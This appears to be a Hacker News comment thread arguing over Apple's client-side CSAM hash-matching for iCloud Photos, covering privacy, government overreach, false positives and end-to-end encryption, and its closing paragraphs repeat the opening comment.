Exactly, I think people are just getting a little too worked up over this whole thing. Apple computes a hash of each image you upload to iCloud then check it against a list of CP hashes.
Of all the things in the world to get worked up over, this is ridiculous.
I get it, the mechanism they're using has apparent flaws, and maybe some whacko could somehow get access to your phone and start uploading things that trick the algorithm into thinking you have CP.
But, that alone is such a ridiculous phobia, if someone has that level of access to your phone, they could upload real CP and maybe even upload it to your Facebook for good measure.
Apple's using my electricity and my silicon to call the cops on me. We have no idea what hashes they're checking images against; we can't see the raw data, and we can't see the hashes, and we can't see what they're sending to their servers.
There is no technical reason why this needs to exist. If they want to scan iCloud photos for something, they can do that on their servers. iCloud is not end-to-end encrypted. Law enforcement can do whatever they want with the data you send there. Since they chose the client-side route, they have to be up to something, and it all smells very fishy. Today, they say it's for CSAM. Tomorrow, it will be for any discontent against whatever government wants to oppress its people this week -- and as time goes forward, that is not just third-world countries where you don't live, it could be your own.
Do you really want to explain to the police at your door at 3:30 in the morning why you read a website called Hacker News? This is the first step towards that reality.
Imagine I wrote a program that contained the phone numbers of people I don't like. The database is encrypted, and the only way to see if you're on that list is to install the app on your phone. The app does two things -- nothing if you're not on my list, or it sends me your location (at your expense!) if you are. Would you install that app? Absolutely not, that would be crazy. But that is basically what is bundled into iOS now.
I really like my iPhone and iPad Pro. I like how Apple handles privacy in general. But I can't accept this. It's a step too far. You don't have to draw the line there, but I draw the line there.
> Apple's using my electricity and my silicon to call the cops on me.
Okay.
> We have no idea what hashes they're checking images against; we can't see the raw data, and we can't see the hashes, and we can't see what they're sending to their servers.
Apple is getting the entire image regardless, this happens as part of the iCloud upload process.
> There is no technical reason why this needs to exist. If they want to scan iCloud photos for something, they can do that on their servers. iCloud is not end-to-end encrypted. Law enforcement can do whatever they want with the data you send there. Since they chose the client-side route, they have to be up to something, and it all smells very fishy.
It's a hell of a lot cheaper to distribute the load onto the device than to do it on GCP. However, this whole line of thinking is ridiculous, iOS is your operating system, it can send what it likes where it likes without you knowing about it. Why does this particular thing cause concern?
> Tomorrow, it will be for any discontent against whatever government wants to oppress its people this week -- and as time goes forward, that is not just third-world countries where you don't live, it could be your own.
> Do you really want to explain to the police at your door at 3:30 in the morning why you read a website called Hacker News? This is the first step towards that reality.
> Imagine I wrote a program that contained the phone numbers of people I don't like. The database is encrypted, and the only way to see if you're on that list is to install the app on your phone. The app does two things -- nothing if you're not on my list, or it sends me your location (at your expense!) if you are. Would you install that app? Absolutely not, that would be crazy. But that is basically what is bundled into iOS now.
Again, your overlooking the fact that this app is already coming from Apple the company that made iOS. They already control your phone, why would they need some additional app?
From the Slippery Slope page, their first example of a false slippery slope: "We can't permit the sale of marijuana by doctor's prescription, because that will lead people to believe it's an acceptable drug; this will open the floodgates to the complete legalization of the drug for use by every pothead in the country."
Your line is the maybe pennies of electricity over the lifetime of the phone? Weird. I can totally understand your line being the CSAM scanning itself but you seem to be fine with the exact same scanning being done with even more opaqueness and less transparency because it's done server side.
I also get the slippery slope thing since you don't really have any control over what your device does but that's been true since forever. Running some scan() method and posting matches to a URL is something that literally could have been done in the last 10 years. It's not like this tech is magically enabling something that wasn't possible before.
And I do get the using your resources argument but iPhones have had integrated DRM since forever.
The thing I don't get is why now? Surely you should have left ages ago?
Apple could scan on the cloud. Rumor is that Apple wants to use E2E on iCloud, and this is a necessary step to shut up the government's biggest critique of E2E and deploy it before the government can figure out a different excuse. We'll see if that pans out.
Totally missed the point. The direction of scanning everyone's phone for 'prohibited content', pushed on them by various governments. Be it political, fine in one country but not in another (adult homosexual), etc. And a future where the content scanning applies AI and reports you for doing such things such as taking pictures of police or protests.
Why should Apple let pedophiles store CSAM on iPhones just because they’re not uploading it to iCloud Photo Library? It’s morally reprehensible to not disable that flag when it’s such a simple thing they can do to catch so many more criminals!
This is obviously sarcasm but I'd preface it with an explanation since HN is multicultural and not not everyone here is brought up to catch it effortlessly.
Edit: The point here is that even if Apple tries very hard to make this be only about photos about to be uploaded to the cloud, if the percentage of phones that turns off iCloud storage increases as a response to this new "snitch-on-me" feature that will be a very good argument for law enforcement to ask for a list of IMEIs that are not using iCloud, and it will also tempt them to demand that Apple start scanning all files.
It's very simple. You want to upload images to iCloud? Then let your phone scan it and upload it. You don't want your images scanned? Don't upload them to iCloud.
As skinkestek kindly pointed out, the point of my sarcastic comment was that now that the precedent of scanning the contents of users’ devices - as opposed to the contents of Apple’s servers - has been set, deciding whether to do so based on the state of a single “Store photos in iCloud?” toggle is going to start looking awfully arbitrary.
If the goal was to make iCloud e2e, why not release both features at the same time so people can see that they're codependent (in Apple's eyes)? Without any kind of announcment or promise of e2e iCloud, we're just speculating for possible reasons why this might be OK. Might as well guess that this is going to allow Apple to give us free iCloud storage, too, while we're coming up with wishlist features.
> we're just speculating for possible reasons why this might be OK.
Sure. All the statements about why it’s not ok are also just speculation.
> why not release both features at the same time
That’s not how Apple typically works. They release a feature, try to make sure it works as expected and only then release the features that depend on it.
Then doesn't that seem hypocritical to you to defend dropping Apple right now for the imagined future possibility that all local photos could be scanned (instead of just the uploads)?
There’s little point in E2E encryption if snooping is moved outside of either end. This measure is only necessary for implementing E2E in iCloud insofar as it allows the feds to do the very thing I want E2E to prevent them from doing in the first place.
It’s as if USPS invented a new type of envelope that is physically impossible to open for anyone whose name is not written on the outside of it. Just one caveat: before they’ll give you any of these envelopes, you must allow them to read the letters being put inside.
If your concern is someone intercepting your mail before it gets to its intended recipient, this is great news. If your threat model involves federal agencies reading your mail, you’re no better off than you would be without these fancy new envelopes.
Scanning people's on-phone photos clearly has nothing to do with being a precursor to e2e encryption. The photos get transferred either way, so one has nothing to do with the other.
Followed by this, "The photos get transferred either way, so one has nothing to do with the other."
It was clearly a technical statement not a privacy statement, so only superficial reading might lead one to believe it meant something that it did not.
That is why I replied that the person who replied to my comment, where I said I had argued something different, but that what he wrote was an excellent point.
So, what on earth are you so invested in that you feel the need to argue minutiae that don't apply?
> "The photos get transferred either way, so one has nothing to do with the other."
That doesn’t change anything. It may be a pre-requisite from the perspective of their business. You replied to me and I didn’t constrain my point to just technicalities.
> So, what on earth are you so invested in that you feel the need to argue minutiae that don't apply?
It does apply. I’m simply pointing out that what you said is not correct.
You know, I could respect your opinion that this is where you draw the line, but you ignore all of Apple's history if you think this is the first step. This isn't the first step, this isn't the first chapter, this is at best the middle of the book where the plot twist happens.
No, this is clearly no the first step. This is the first step you chose to see the reality of the situation. You'll look back and you'll see how everything was paved with good intentions and how people sounding the alarm were ignored.
Also, all of the "situations" where this could be abused are already applicable on all other platforms. There's no reason your Ex couldn't upload CSAM to your Google Photos account, or to your Facebook account. Google Photos and predecessors have scanned since, what, 2013?, and would detect it, and would report it to law enforcement.
Despite this having been a possibility for almost a decade... there's a suspicious lack of headlines of this attack occurring.
Apple hashes all of your photos offline and then pinky promises to only check the hashes against the official on phone database when the user initiated an upload. The problem isn’t about wackos it’s about governments forcing Apple to do things with this new weapon
If Apple really is trying to sneak in a CSAM database on your phone with iCloud disabled, someone WILL catch it and raise so much hell we'll all hear it.
If Apple were going to lie about this process, they didn't need to announce it and go into so much detail at all. They could have just kept it quiet the way the current server side CSAM scanning is done by others already. The legal and market impacts of Apple lying would be severe.
I haven't seen a single person concerned about Apple scanning photos in iCloud. The problem is entirely that the scan is happening on your personal phone with apparently some janky implementation that in one week has already shown to have serious flaws.
> Exactly, I think people are just getting a little too worked up over this whole thing. Apple computes a hash of each image you upload to iCloud then check it against a list of CP hashes.
If that is what is supposed to happen, then it makes no sense for any new code to run on the device!
> Of all the things in the world to get worked up over, this is ridiculous.
Well, it is not crazy to get worked up over Apple saying they will check uploads to iCloud by checking what's on your phone - instead of simply adding code to iCloud. That seems obvious not ridiculous.
> If that is what is supposed to happen, then it makes no sense for any new code to run on the device!
The new code calculates the hash as part of the upload process. The comparison of the hash against known CP hashes happen on the server.
> Well, it is not crazy to get worked up over Apple saying they will check uploads to iCloud by checking what's on your phone - instead of simply adding code to iCloud.
They're still doing the checks in iCloud, but the hash is being computed on the client.
Okay, well they're likely doing it to save money. I work in data engineering and I can tell you calculating the hash of every iCloud upload wouldn't come cheap.
You are completely missing the point. The answer to a privacy and security question shouldn't be, "it is easy for us to do things this way." You are inadvertently making the point that you are arguing against.
Going back to your original point, what makes you think checking for CP in images uploaded to iCloud is more private or secure when Apple's servers analyse the entire image, rather than having the client generate a hash of the image and having Apple's servers analyse that instead?
I work in data engineering and I can tell you what I'd rather do. Having Apple's servers check hashes rather than the entire image means you can segregate the original images from the CP-checker data processing pipelines. That's a much simpler and more secure security scenario.
> I get it, the mechanism they're using has apparent flaws, and maybe some whacko could somehow get access to your phone and start uploading things that trick the algorithm into thinking you have CP.
Whatsapp by default adds all received images into Photos. So all it takes is to send you few dozens of pictures while you're sleeping.
Maybe consider that CP is just the excuse for the backdoor.
So apart from every Apple user being treated like a proven-until-innocent owner of CP, at all times, this will (yes, a matter of time) be used for political purposes, to find and silence activists, journalists, to discredit opposition leaders, to prosecute Uyugur/Muslims/women/palestinians etc.
Do we really believe that CP owners store their collections in iCloud / google cloud / Dropbox and view them on their phones? And that this is an issue on a massive scale?
Please.
These are the most expensive phones on the market, with an incredible profit margin for Apple. The part of these devices that we actually own is a shrinking territory.
Why not have the mics on all the time in case “someone says something related to a CP ring?”
And if you have iCloud Photos turned on, those images are already being uploaded and then CSAM-scanned on Apple’s servers. The chain is just being configured differently, but this risk is already active.
The actual problem is that they've created a great surveillance tool which will inevitably get broader capabilities and they are normalising client-side data scanning (we need to eradicate terrorism, now we need to eradicate human trafficking, and now we need to eradicate tax evasion, oh, we forgot about gay russians, hmm, what about Winnie memes?).
But this was already true. There is no reason the governments couldn't have required this tool to be built at anytime all along. Remember EARN IT where Senators said figure something out (like this CSAM tool) or they'll do it for Apple? The EU is similar, with upcoming draft legislation saying they have to do it if they don't figure something (like this) out.
Back during the FBI/Apple fiasco where the government was lobbying Apple to install a backdoor to unlock phones, Apple argued that their 1st Amendment Rights were being violated, that the government could not force them to write software (since software is speech, and the government cannot force you to say something against your will)
Edit: but through regulations they could probably say 'you're not allowed to sell phones without x backdoor' but maybe the government didn't want to spell out specifically what capabilities are required.
Which is why CSAM is possibly a really interesting compromise/counter-argument. Supposedly, the only actual crime that the FBI has repeatedly sent warrants to Apple about have been child pornography/trafficking and it's an interesting stance for Apple to take here: "we'll address the actual and specific crime you seem most interested in, but will still not give you a generic backdoor".
Many of the arguments/fears about CSAM is that it can be widened to be a generic backdoor, but as you point out in the arguments Apple has already argued in court Apple doesn't seem to think a generic backdoor is a good idea and have strongly fought against it and CSAM seems to be entirely designed to not be capable as backdoor, and especially not a generic backdoor.
I absolutely understand the fears of false positives and whatever processes the FBI and other TLAs choose to do with the results from CSAM (though many of those concerns apply to everything the TLAs do regardless of what technical tools they have at their disposal), but I'm not sure that I understand all the fears that CSAM is a generic backdoor (in the making) given what Apple have revealed about how it is built and what Apple's quite explicit reasons seem to be to build it to entirely avoid building a generic backdoor and that everything about it seems a "thumb your nose at the FBI by doing what they ask explicitly for but not what they really want to build" by entirely building something that can't be used as a generic backdoor and is very specifically built to only a tiny explicit use case the FBI has asked for. At least from what I've seen so far.
You still may donate to liberty and FOSS NGOs, switch to ungoogled Android and drop macOS in favour of Linux. Also you have your rights and opportunities for activism and peaceful protest. This is not illegal yet (effectively illegal in Russia/China though).
This kinda of sounds like "let them put a camera in my living room, I'm not doing anything wrong".
The biggest complaint here is clearly this is not where it'll end, and it's not a unique hash, so there will be false positives. And since it's publicly announced, this is very unlikely to catch any producers of CP, and would only catch the dumbest consumers. So it's an invasion of privacy with very little chance of having a noticeable impact.
>Apple computes a hash of each image you upload to iCloud then check it against a list of CP hashes.
I don't think it computes a hash of the image, it's a tad more involved than that.
Simple hashing is easily evaded. They must be computing an identifier from the contents of the images in the CSAM database. This requires computational analysis on the handset or computer. If that's all that were happening that would be no problem, but of course there are management interfaces to the classifer/analyzer, catalog, backend, &c
The contents of the identifiers are purposefully opaque to prevent spoofing of the identifier database. I don't know what is included in the images; what if I take a picture at Disneyland with a trafficked person in the frame? Will that make it into the qualifier database? What is added to the CSAM signature database and why? What is the pipeline of hashesfrom NCMEC and other child-safety organizations->Apple's CSAM image classifer alarm?
>I get it, the mechanism they're using has apparent flaws, and maybe some whacko could somehow get access to your phone and start uploading things that trick the algorithm into thinking you have CP.
The CSAM analyzer could be subverted in any number of ways. I question how the CSAM identifiers are monitored for QA (I actually shudder thinking there are already humans doing this :( how unpleasant.) and the potential for harmful adversaries to repurpose this tool for other means. One contrived counterfactual: Locating pictures of Jamal Kashoggi in people's computer systems by 0-day malware. Another: Locating images of Edward Snowden. A more easily conceived notion: Locating amber alert subjects in people's phones, geofenced or not.
To my eyes, it appears we will soon have increased analysis challenges. Self analysis of device activity and functions for image scanning malware (for example) is slightly harder, we have added a blessed one with unknown characteristics running on the systems. Does this pose a challenge to system profiling? How/does this interact with battery management? Is only iCloud scanning, or is everything scanned and then only checked before being sent to iCloud? (this appears to be the case[X])
There should be user notification too. If some sicko sends me something crazy somehow, I would surely want to know so I can call the cops!!
All in all this makes me feel bad. There is not a lot of silver lining from my perspective. While the epidemic of unconscionable child abuse continues, I question the effectiveness of this approach.
I would not consider jailbreaking my iPhone but for this kind of stuff. I would like to install network and permissions monitoring software on my iPhone such as Bouncer[0], Little Snitch[1], although these are helpfully not available for iOS.
I feel grateful that I am unlikely to be affected by this image scanning software, I'm planning to continue my personal policy of never storing any pictures of any people whatsoever. I don't even store family photos this way. My Life is not units in a data warehouse.
> I think people are just getting a little too worked up over this whole thing.
They aren't, but the blame is misguided. This isn't a problem with Apple. What is Apple going to do if they do detect something identified as CSAM on your device? Refuse to sell you another? Oh well. The real worry is what other parties will do if they get ahold of the information. That is what needs to be fixed. Apple is exposing the underlying problem, not causing the problem themselves.
Apple have said what they're going to do. If the number of hash hits reaches 30, then they'll scale the image down and send it off to their manual review team. If they confirm it's CP, then they call the police.
Exactly. They're not going do much of anything. It is what happens after the final step outlined that actually concerns people, and that is where the real problem lies. Apple is simply exposing the problem; or perhaps more accurately bringing the problem we all understand exists into the limelight. Had Apple not implemented this feature, or implemented it differently (scanning server-side, for example), the problem would still be there.
Totally reasonable response. I would like Apple to notify me so that I can call the police after my threshold of one NCMEC and other child-safety organization image identifier matches on my personal computer systems.
This will violate my IT device usage policy! Apple is not my IT department!!
We have a ZERO TOLERANCE IT device usage policy. By not calling the local police department after one violation, we violate the policy. There is also a form which must be signed before HR (Girlfriend) so they can be present on the call to LE or else be subject to disciplinary action up to and including termination.
As it turns out, people don't like having to deal with police, nor do they like the idea of potentially losing a trial (especially in the court of public opinion).
I have no feelings towards the topic. I am merely summarizing what the consensus is writing on places like HN towards what Apple is doing.
The general sentiment does appear to be that the laws are misguided. That does not necessarily mean repeal is necessary. Augmentation may also provide a solution that satisfies their concerns. However, that is moving well beyond the topic at hand. There is no indication I can find that some kind of change is controversial. There is clear worry about the status quo based on the potential outcome of what information Apple may glean.
What remains is that Apple isn't anyone's real concern. An inanimate corporation can't do much to you. Apple is simply bringing attention to what actually concerns people, which is something that was already there all along.
Of all the things in the world to get worked up over, this is ridiculous.
I get it, the mechanism they're using has apparent flaws, and maybe some whacko could somehow get access to your phone and start uploading things that trick the algorithm into thinking you have CP.
But, that alone is such a ridiculous phobia, if someone has that level of access to your phone, they could upload real CP and maybe even upload it to your Facebook for good measure.